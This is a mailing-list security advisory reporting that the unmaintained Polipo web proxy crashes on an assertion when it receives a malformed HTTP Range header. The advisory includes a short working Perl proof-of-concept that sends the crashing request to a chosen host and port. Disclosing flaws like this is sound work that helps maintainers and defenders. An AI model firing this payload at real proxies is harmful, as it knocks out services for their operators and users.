[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] Polipo: denial-of-service using range
From: Alexandr Savca (chinarulezzz) <alexandr.savca89 () gmail ! com>
Date: 2020-11-18 15:12:06
Message-ID: 20201118171206.443be0215d1b142b5ce7584e () gmail ! com
[Download RAW message or body]
Hi all,
I suppose I found a vulnerability in the Polipo [1],
lightweight, caching web proxy.
Since the author wrote that he no longer maintains this project [2]
I decided to write here because polipo is widely used in Linux/BSD [3],
and there are many maintainers.
Summary
=======
It is possible to cause a denial of service through a specific
Range header value.
Overview
========
RFC7233 states [4]:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
A server that supports range requests MAY ignore or reject a Range
header field that consists of more than two overlapping ranges, or a
set of many small ranges that are not listed in ascending order,
since both are indications of either a broken client or a deliberate
denial-of-service attack (Section 6.1). ...
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Polipo doesn't ignore/reject the malformed header. Instead, it has
an assertion:
server.c:1473: assert(from >= 0 && (to < 0 || to > from));
So, a malformed Range header ("Range: bytes=3-2" for example) will
cause an assertion failed. This error handling allows an attacker
to cause a denial of service.
PoC
===
#!/usr/bin/perl
use autodie;
use Socket;
$host = $ARGV[0];
$port = $ARGV[1];
$iaddr = inet_aton($host);
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto);
connect(SOCK, $paddr);
send(SOCK, "GET http:// HTTP/1.1\r\n", 0);
send(SOCK, "Range: bytes=3-2\r\n\r\n", 0);
print while <SOCK>;
Affected Versions
=================
All
Links
=====
[1] https://www.irif.fr/~jch//software/polipo/
[2] https://github.com/jech/polipo/commit/4d42ca1b5849518762d110f34b6ce2e03d6df9ec
[3] https://repology.org/project/polipo/badges
[4] https://tools.ietf.org/html/rfc7233#section-3.1
--
Kind Regards,
Alexandr
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFq+QgQBCADW52hQ0aRC/tqvQPPPSCdbBFjKPKKrS1l1sbjOtQKLoZwfsnuu
5a8UBgJzpTBBrHKz5ackfIBSmmsGJ33hRzDwwJJHeG3W1e2Y5alEmD+Yc/ck9Lgf
ed8Y1XKHp8exCy71/bUDWmoXHficWFVsGnlrVOeEZ9drF836dbQ2FDSmeLh+m+0X
ifI5+7eI8U4Tf5JrbacqqQnsJBB3EfnORi0hvvyYZsFKUF1ibHVDGpMgHifIoh9t
B/sAYgz0wXa9v4s2U2zMXymg/rirpAs+UfewBkaE4RiQHUjqnKYSWqXpT7uuyPNl
Dm1ChyPbmJ20rTi1SDNrhvRWU+agExaKUqXrABEBAAG0OkFsZXhhbmRyIFNhdmNh
IChjaGluYXJ1bGV6enopIDxhbGV4YW5kci5zYXZjYTg5QGdtYWlsLmNvbT6JAU4E
EwEIADgWIQSy17a4VVrhcgmkZdVZ7BmG+9kCzwUCWr5CBAIbAwULCQgHAgYVCgkI
CwIEFgIDAQIeAQIXgAAKCRBZ7BmG+9kCz/CyB/4/G6rZFrc38jzhyaN+QwSZ/sFn
KtN7Qx3CAA0qNWDeBmPPwtyDC0s/n/3BtNFztJzeuoA5LSfBknJPchMu/N7qpmo/
kotQuUn53vv3SJwM22nN4Dtr9k/LWgY2EkovI5gGAMlxZuoD/mFujZzPq21QzgzG
Sm2qDTd1d9Ig/NiQ7S7yuPcyPKbl/4BwQd2zKB5LyNsmnoMxCFbc7Qhm+CS4OLr2
wPPbodXeG3blJSTKvcUbpU4VZIrpdbUssS8YvPvpmy/M3joPYaAKa5iCBWlT9my2
GPwbjQhISV/8NH9FQgAZi3QWotJ25tauI54Lf3cDbfRtThvXQjXbTJ78bY1vuQEN
BFq+QgQBCADLpvR4D0t1DUd9/8PHRzAL9ZaG3WQhXuTcydbCvTNNoepMakG+yM8E
1gjVuGz3fGPM5P92f59sQLWpqeHjVRtaFKn3f8O+ewhrArgAmP6WrzBIK/ovcXQ0
LjTo57yUQW1X1GWtHOXTvl4DCALr6KG5zcw8dpreJHAjIS1+4LRWs/vAJRUt2ORP
4JYanSwKn8ANshchMDkq+nlpssUren/PcAZ5oXlZM25zZIYKONP1SHby48v6v8jQ
kNa1f6UIkop4of0vt0WhKsoOlgTqO532UuDNorpktQi/TXgj1emn+HMCOAhMtPuW
8dd8HAu9Tgl25waear9gSGNPkdK15FZpABEBAAGJATYEGAEIACAWIQSy17a4VVrh
cgmkZdVZ7BmG+9kCzwUCWr5CBAIbDAAKCRBZ7BmG+9kCzzI3B/0TH4ikTcqHZAk/
SSizGKDXIoz5IkXkTcFo1lzIZabqIiT54vxl6fsPv5H/8cn3JUrU9aZKoLHh30kN
j0HhVcdltKh6nGnQnuYgRWhoEjE1PoGXAOlz4PTlc23jM7JFjynIuF/0jEnMk2AG
k3L+kDS7ReTAHQTSbJYLJwP2vDlEZ60b8xzXjYWRdDZwttfad0SkNcSAVYzbF3Gn
t6HHi81Ssqv9l5zAtxnFn7thoLegRFta+LnyIkEqkg8Z3VfHUAOuMO3W+bGDfAix
JnGdDlc2OCEcWoZVIuOiqEryff8wbgz5M0PVbby6y4Zop73LCJFm3Kz2n/jJOMJd
lgLES/Ed
=U0Dk
-----END PGP PUBLIC KEY BLOCK-----
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic